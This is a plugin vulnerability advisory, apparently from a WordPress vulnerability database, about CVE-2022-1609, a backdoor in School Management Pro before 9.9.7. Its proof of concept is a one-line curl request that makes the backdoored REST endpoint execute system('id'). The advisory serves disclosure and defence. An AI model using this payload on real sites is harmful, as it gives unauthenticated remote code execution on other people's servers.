WordPress Plugin Vulnerabilities

The School Management < 9.9.7 - Unauthenticated RCE via REST api

Description

The plugin contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.

Proof of Concept

curl -d 'blowfish=1' -d "blowf=system('id');" 'https://examples.com/wp-json/am-member/license'

Affects Plugins

Plugin icon
school-management-pro
Fixed in 9.9.7

References

CVE
CVE-2022-1609

Classification

Type
RCE
OWASP top 10
A1: Injection
CWE
CWE-94
CVSS
10.0 (critical)

Miscellaneous

Original Researcher
Jetpack Scan Team + WordPress elevated support team
Submitter
Harald Eilertsen
Submitter website
https://jetpack.com
Verified
Yes
WPVDB ID
e2d546c9-85b6-47a4-b951-781b9ae5d0f2

Timeline

Publicly Published
2022-05-18 (about 1 years ago)
Added
2022-05-18 (about 1 years ago)
Last Updated
2023-02-10 (about 1 years ago)

Other

Published
Title
Published
2020-10-09
Title
Autoptimize < 2.7.8 - Race Condition leading to RCE
Published
2014-08-01
Title
Archin 3.2 - hades_framework/option_panel/ajax.php Configuration Option Manipulation
Published
2024-01-24
Title
File Manager Pro < 8.3.5 - Authenticated (Subscriber+) Arbitrary File Upload
Published
2014-08-01
Title
WordPress 2.1.1 - Command Execution Backdoor
Published
2014-08-01
Title
WP-Super-Cache 1.3 - Remote Code Execution